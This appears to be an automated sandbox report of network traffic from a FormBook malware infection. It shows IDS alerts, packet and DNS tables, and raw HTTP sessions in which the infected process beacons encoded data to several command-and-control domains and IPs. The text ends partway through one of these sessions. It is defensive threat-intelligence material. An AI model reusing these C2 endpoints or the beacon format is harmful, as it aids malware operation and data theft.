2024-12-16T08:39:00.889862+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49959	3.33.130.190	80	TCP
2024-12-16T08:39:16.150325+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49992	8.217.17.192	80	TCP
2024-12-16T08:39:18.931762+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49999	8.217.17.192	80	TCP
2024-12-16T08:39:21.707764+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50007	8.217.17.192	80	TCP
2024-12-16T08:39:24.373516+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50015	8.217.17.192	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 08:38:34.611658096 CET	49900	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:34.731456041 CET	80	49900	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:34.731749058 CET	49900	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:34.753885984 CET	49900	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:34.873725891 CET	80	49900	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:35.828718901 CET	80	49900	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:35.828856945 CET	80	49900	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:35.829132080 CET	49900	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:35.832089901 CET	49900	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:35.951760054 CET	80	49900	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:51.508291960 CET	49940	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:51.628113031 CET	80	49940	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:51.628247976 CET	49940	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:51.638763905 CET	49940	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:51.758795023 CET	80	49940	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:52.725502014 CET	80	49940	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:52.725637913 CET	80	49940	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:52.725836992 CET	49940	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:53.150183916 CET	49940	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:54.169003010 CET	49947	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:54.288809061 CET	80	49947	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:54.288919926 CET	49947	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:54.299937963 CET	49947	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:54.419855118 CET	80	49947	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:55.387499094 CET	80	49947	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:55.387607098 CET	80	49947	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:55.387772083 CET	49947	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:55.806488037 CET	49947	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:56.824757099 CET	49952	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:57.133845091 CET	80	49952	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:57.133991957 CET	49952	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:57.144619942 CET	49952	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:57.264309883 CET	80	49952	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:57.264477015 CET	80	49952	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:58.234006882 CET	80	49952	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:58.240725994 CET	80	49952	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:58.241023064 CET	49952	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:58.650305986 CET	49952	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:59.669087887 CET	49959	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:59.788785934 CET	80	49959	3.33.130.190	192.168.2.6
Dec 16, 2024 08:38:59.788918972 CET	49959	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:59.796670914 CET	49959	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:38:59.917244911 CET	80	49959	3.33.130.190	192.168.2.6
Dec 16, 2024 08:39:00.889676094 CET	80	49959	3.33.130.190	192.168.2.6
Dec 16, 2024 08:39:00.889698029 CET	80	49959	3.33.130.190	192.168.2.6
Dec 16, 2024 08:39:00.889862061 CET	49959	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:39:00.892579079 CET	49959	80	192.168.2.6	3.33.130.190
Dec 16, 2024 08:39:01.012567043 CET	80	49959	3.33.130.190	192.168.2.6
Dec 16, 2024 08:39:14.509700060 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:14.629654884 CET	80	49992	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:14.629796028 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:14.640925884 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:14.760824919 CET	80	49992	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:16.150325060 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:16.162918091 CET	80	49992	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:16.162987947 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:16.163242102 CET	80	49992	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:16.163322926 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:16.270251036 CET	80	49992	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:16.270348072 CET	49992	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:17.169503927 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:17.406770945 CET	80	49999	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:17.406903028 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:17.418270111 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:17.540535927 CET	80	49999	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:18.931761980 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:18.960903883 CET	80	49999	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:18.960971117 CET	80	49999	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:18.961071968 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:18.961071968 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:19.052310944 CET	80	49999	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:19.052406073 CET	49999	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:19.950077057 CET	50007	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:20.069828987 CET	80	50007	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:20.069935083 CET	50007	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:20.081794024 CET	50007	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:20.201592922 CET	80	50007	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:20.201693058 CET	80	50007	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:21.707763910 CET	50007	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:21.828836918 CET	80	50007	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:21.828921080 CET	50007	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:22.718727112 CET	50015	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:22.840342045 CET	80	50015	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:22.840521097 CET	50015	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:22.847723961 CET	50015	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:22.967636108 CET	80	50015	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:24.373280048 CET	80	50015	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:24.373405933 CET	80	50015	8.217.17.192	192.168.2.6
Dec 16, 2024 08:39:24.373516083 CET	50015	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:24.985510111 CET	50015	80	192.168.2.6	8.217.17.192
Dec 16, 2024 08:39:25.105536938 CET	80	50015	8.217.17.192	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 08:38:34.015033007 CET	55695	53	192.168.2.6	1.1.1.1
Dec 16, 2024 08:38:34.599478960 CET	53	55695	1.1.1.1	192.168.2.6
Dec 16, 2024 08:38:50.872565985 CET	62325	53	192.168.2.6	1.1.1.1
Dec 16, 2024 08:38:51.505599022 CET	53	62325	1.1.1.1	192.168.2.6
Dec 16, 2024 08:39:05.904154062 CET	57480	53	192.168.2.6	1.1.1.1
Dec 16, 2024 08:39:06.122493029 CET	53	57480	1.1.1.1	192.168.2.6
Dec 16, 2024 08:39:14.235147953 CET	55958	53	192.168.2.6	1.1.1.1
Dec 16, 2024 08:39:14.505341053 CET	53	55958	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 08:38:34.015033007 CET	192.168.2.6	1.1.1.1	0xdf16	Standard query (0)	www.arcare.partners	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:50.872565985 CET	192.168.2.6	1.1.1.1	0x3219	Standard query (0)	www.medicaresbasics.xyz	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:39:05.904154062 CET	192.168.2.6	1.1.1.1	0x14d0	Standard query (0)	www.resellnexa.shop	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:39:14.235147953 CET	192.168.2.6	1.1.1.1	0x2221	Standard query (0)	www.meliorahomes.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 08:38:34.504481077 CET	1.1.1.1	192.168.2.6	0xa83d	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 08:38:34.504481077 CET	1.1.1.1	192.168.2.6	0xa83d	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:34.504481077 CET	1.1.1.1	192.168.2.6	0xa83d	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:34.599478960 CET	1.1.1.1	192.168.2.6	0xdf16	No error (0)	www.arcare.partners	arcare.partners		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 08:38:34.599478960 CET	1.1.1.1	192.168.2.6	0xdf16	No error (0)	arcare.partners		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:34.599478960 CET	1.1.1.1	192.168.2.6	0xdf16	No error (0)	arcare.partners		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:51.505599022 CET	1.1.1.1	192.168.2.6	0x3219	No error (0)	www.medicaresbasics.xyz	medicaresbasics.xyz		CNAME (Canonical name)	IN (0x0001)	false
Dec 16, 2024 08:38:51.505599022 CET	1.1.1.1	192.168.2.6	0x3219	No error (0)	medicaresbasics.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:38:51.505599022 CET	1.1.1.1	192.168.2.6	0x3219	No error (0)	medicaresbasics.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:39:06.122493029 CET	1.1.1.1	192.168.2.6	0x14d0	Name error (3)	www.resellnexa.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:39:14.505341053 CET	1.1.1.1	192.168.2.6	0x2221	No error (0)	www.meliorahomes.net		8.217.17.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.arcare.partners

www.medicaresbasics.xyz

www.meliorahomes.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49900	3.33.130.190	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:38:34.753885984 CET	520	OUT	GET /0w45/?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8= HTTP/1.1 Host: www.arcare.partners Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Dec 16, 2024 08:38:35.828718901 CET	393	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 16 Dec 2024 07:38:35 GMT content-length: 272 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 42 3d 46 70 61 6c 4b 62 45 78 6a 26 66 36 59 34 74 66 44 3d 59 68 39 54 4b 6d 7a 52 50 6c 36 30 48 63 75 47 33 51 2f 50 30 45 68 5a 70 78 6c 77 41 38 2b 58 75 47 30 76 46 68 63 4d 41 53 56 2f 57 2f 61 2b 64 53 4a 52 73 7a 72 56 43 45 31 76 72 79 4e 39 57 78 48 48 46 31 5a 66 74 51 43 31 34 31 5a 2f 2f 46 6b 36 4c 53 45 6e 33 71 57 54 48 49 49 4d 41 55 64 4a 46 63 54 72 70 54 69 4e 2f 4a 51 65 4f 76 78 48 30 52 67 71 73 30 72 59 6f 77 37 65 74 53 32 37 69 57 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49940	3.33.130.190	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:38:51.638763905 CET	797	OUT	POST /fm31/ HTTP/1.1 Host: www.medicaresbasics.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.medicaresbasics.xyz Referer: http://www.medicaresbasics.xyz/fm31/ Cache-Control: no-cache Content-Length: 212 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 2f 65 38 6a 37 4c 41 5a 71 47 59 75 65 2f 2f 6d 50 58 71 48 71 38 48 75 4d 57 73 43 69 33 63 6f 51 33 41 4a 69 52 42 38 41 73 58 Data Ascii: f6Y4tfD=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX
Dec 16, 2024 08:38:52.725502014 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49947	3.33.130.190	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:38:54.299937963 CET	821	OUT	POST /fm31/ HTTP/1.1 Host: www.medicaresbasics.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.medicaresbasics.xyz Referer: http://www.medicaresbasics.xyz/fm31/ Cache-Control: no-cache Content-Length: 236 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 31 38 6d 48 37 48 37 47 62 39 57 51 62 51 4b 50 6b 59 64 4e 58 4a 61 67 37 72 39 46 52 78 38 69 2f 36 6e 64 6c 6f 69 63 35 4b 42 34 48 77 36 48 52 77 70 73 7a 74 34 51 31 6d 42 75 5a 32 52 71 38 43 39 61 6b 77 6e 78 34 4d 7a 66 6d 57 6c 32 43 4e 72 4b 6f 30 46 6b 53 35 57 54 63 32 45 42 6f 50 70 39 58 67 51 33 34 30 4d 41 33 49 4f 4a 6b 62 69 76 78 53 59 63 62 6a 38 74 48 45 4d 74 66 37 72 6f 69 6c 36 38 58 4a 56 36 63 46 75 4f 4f 65 43 43 33 32 71 51 50 41 62 31 64 6d 7a 30 4a 30 71 6f 6a 6a 42 71 49 4b 5a 76 44 54 2f 4c 4c 2b 51 6f 52 77 47 77 3d 3d Data Ascii: f6Y4tfD=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo18mH7H7Gb9WQbQKPkYdNXJag7r9FRx8i/6ndloic5KB4Hw6HRwpszt4Q1mBuZ2Rq8C9akwnx4MzfmWl2CNrKo0FkS5WTc2EBoPp9XgQ340MA3IOJkbivxSYcbj8tHEMtf7roil68XJV6cFuOOeCC32qQPAb1dmz0J0qojjBqIKZvDT/LL+QoRwGw==
Dec 16, 2024 08:38:55.387499094 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49952	3.33.130.190	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:38:57.144619942 CET	1834	OUT	POST /fm31/ HTTP/1.1 Host: www.medicaresbasics.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.medicaresbasics.xyz Referer: http://www.medicaresbasics.xyz/fm31/ Cache-Control: no-cache Content-Length: 1248 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 42 75 4a 45 57 4c 41 43 2f 4a 5a 4a 34 78 35 74 6c 7a 2b 45 77 30 44 77 71 33 37 37 71 6f 39 38 6c 30 44 48 70 31 44 39 58 51 62 51 4a 50 6b 5a 64 4e 57 56 61 67 6a 76 39 46 64 50 38 6b 37 36 31 76 74 6f 6b 6f 56 4b 55 49 48 77 79 6e 52 74 6d 4d 7a 43 34 51 6c 63 42 75 4a 32 52 71 38 43 39 63 41 77 33 54 63 4d 38 2f 6d 4a 69 32 43 4a 76 4b 70 68 46 6b 71 70 57 53 70 44 46 77 55 50 6f 65 76 67 63 6b 41 30 41 41 33 4b 50 4a 6c 47 69 76 38 4b 59 66 76 76 38 74 62 69 4d 71 76 37 70 4a 66 64 69 75 6a 64 47 4c 73 59 33 39 47 59 4e 33 7a 44 79 7a 72 47 64 6b 74 5a 7a 41 39 50 71 49 75 35 4b 4d 78 39 51 74 43 2f 38 2b 53 61 61 37 6f 46 57 71 6d 41 39 6f 6d 52 4e 57 44 47 66 34 4b 72 74 58 38 78 68 37 4f 39 72 59 54 51 31 63 39 51 68 43 30 67 63 74 5a 36 65 61 70 32 6d 62 63 48 71 4c 4d 6c 35 2f 71 56 2f 30 73 75 50 37 44 74 67 7a 35 4a 5a 72 70 74 69 30 34 2b 49 55 54 37 74 72 61 6c 41 62 56 79 68 2b 51 58 6d 30 65 72 71 56 65 4f 36 7a 6a 54 44 79 [TRUNCATED] Data Ascii: f6Y4tfD=OsjO8v07b0TlBuJEWLAC/JZJ4x5tlz+Ew0Dwq377qo98l0DHp1D9XQbQJPkZdNWVagjv9FdP8k761vtokoVKUIHwynRtmMzC4QlcBuJ2Rq8C9cAw3TcM8/mJi2CJvKphFkqpWSpDFwUPoevgckA0AA3KPJlGiv8KYfvv8tbiMqv7pJfdiujdGLsY39GYN3zDyzrGdktZzA9PqIu5KMx9QtC/8+Saa7oFWqmA9omRNWDGf4KrtX8xh7O9rYTQ1c9QhC0gctZ6eap2mbcHqLMl5/qV/0suP7Dtgz5JZrpti04+IUT7tralAbVyh+QXm0erqVeO6zjTDyYhszfSg3GOGaLT2NqLR+pXTYVw6QGNzvciTJgWMiZySpOj5WYWTpjR3O9g3RBa+mGMTJvqEKVMYxbAZr75jO74WiJFAWqh/OGAbuPY4GHiBq/NKGUTaCjqUNryFvHm/8phRlnICBzIH/N/niwK4Fs3uMPgrucq7mXzLJAHbwwakBjRg0oOH01nHQX2u8q8OoOW1U66Vq7nCCOnB6GpmVLNljlQmkOGBk3v4IdNozZkFm+RjBMhnJPcVpqpOgIdtrWtcUPQzXb7dQ7HwI53PppPcgIXecVgwFchKd8P2yrB73x4QRXoral+aWMABTueVeEiVk4STa0KIm17by/JJ/D6f7e0uoLkk/IwEGV0xbBVgLzbNLN+lVut30/3hmSf+rUbxfl9457DbXe0XO91u0EY72//XYw5U3s1XcM9bYcS3lJ3Ng/iIYJp6zT4ugrOKFtnM5DbFwU0r7EN/7vDP1g+gkmoP6vZKcQvdKS0d4iptAHQ2v+ge0EYA9CFClBS+rpLk5/fe7andobdcmeRFys9vhqx9Lj9/fJhelYprGEJdX3qCbnVqeF+jml14Efny16OiQefcJACnSIdiIA9D4XgPRVPpeUjVifTjMP8zlOoH1u05VcyvXFzVVwJYmw0HhuvKeTg0KlCTyoRIxBrHDTOHYEmAxjmkWv6 [TRUNCATED]
Dec 16, 2024 08:38:58.234006882 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49959	3.33.130.190	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:38:59.796670914 CET	524	OUT	GET /fm31/?f6Y4tfD=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&tB=FpalKbExj HTTP/1.1 Host: www.medicaresbasics.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
Dec 16, 2024 08:39:00.889676094 CET	393	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 16 Dec 2024 07:39:00 GMT content-length: 272 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 36 59 34 74 66 44 3d 44 75 4c 75 2f 5a 4a 45 5a 30 76 73 61 37 4e 4d 57 36 59 31 6c 75 77 4d 73 54 70 55 6a 54 69 61 7a 78 69 4b 73 46 71 4d 6a 6f 63 4a 6d 55 2b 57 7a 30 6e 2b 53 46 44 77 4a 72 42 41 57 34 4c 7a 4a 57 4c 5a 30 30 67 67 74 52 33 46 6c 4e 39 47 75 70 70 47 64 6f 37 61 79 31 4a 77 74 4f 79 4a 36 78 4e 46 47 65 51 4e 56 66 4a 32 38 49 45 46 33 52 4d 58 70 2b 4f 66 70 45 72 4f 75 4d 46 68 64 43 36 37 52 33 67 3d 26 74 42 3d 46 70 61 6c 4b 62 45 78 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?f6Y4tfD=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdo7ay1JwtOyJ6xNFGeQNVfJ28IEF3RMXp+OfpErOuMFhdC67R3g=&tB=FpalKbExj"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49992	8.217.17.192	80	6280	C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 08:39:14.640925884 CET	788	OUT	POST /ir1u/ HTTP/1.1 Host: www.meliorahomes.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.meliorahomes.net Referer: http://www.meliorahomes.net/ir1u/ Cache-Control: no-cache Content-Length: 212 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505) Data Raw: 66 36 59 34 74 66 44 3d 6a 61 69 2f 4e 6f 50 48 6f 42 43 51 68 38 6d 32 31 4e 53 2b 51 35 7a 66 35 4c 68 66 57 78 66 6f 43 49 67 4d 79 31 41 55 62 53 4a 74 56 6f 4b 33 65 64 6f 6e 43 6d 46 6a 30 52 30 53 32 44 6f 4c 5a 71 55 4f 34 4a 76 59 78 68 55 37 33 4a 78 38 4c 63 2f 2f 37 74 47 53 62 6d 32 4f 4c 6b 47 49 50 50 70 61 71 49 4b 4f 42 34 48 62 4b 48 47 48 52 4f 6a 62 38 77 55 71 41 75 7a 63 6f 7a 66 68 2b 4d 43 41 4b 63 78 61 46 37 62 2b 73 56 43 6f 33 52 54 69 79 6c 78 33 59 69 6f 36 70 37 64 69 76 6e 56 74 77 34 6c 4f 58 4f 4f 71 46 75 57 66 6d 